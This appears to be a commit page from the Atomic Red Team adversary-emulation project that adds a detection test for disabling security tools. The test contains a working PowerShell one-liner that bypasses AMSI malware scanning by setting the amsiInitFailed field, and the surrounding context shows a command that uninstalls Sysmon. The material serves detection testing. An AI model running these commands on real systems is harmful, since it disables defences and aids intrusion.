security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

New Detection - T1089 (#568)

Browse Source 
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. This is a simple atomic test that executes this unhooking behavior
This commit is contained in:
JimmyAstle
2019-09-17 14:33:22 -04:00
committed by Michael Haag
parent 1df960f3c4
commit 26263baec9
1 changed files with 13 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1089/T1089.yaml
+13
View File
@@ -150,3 +150,16 @@ atomic_tests:
sysmon -u
cleanup_command: |
sysmon -i -accepteula
- name: AMSI Bypass - AMSI InitFailed
description: |
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)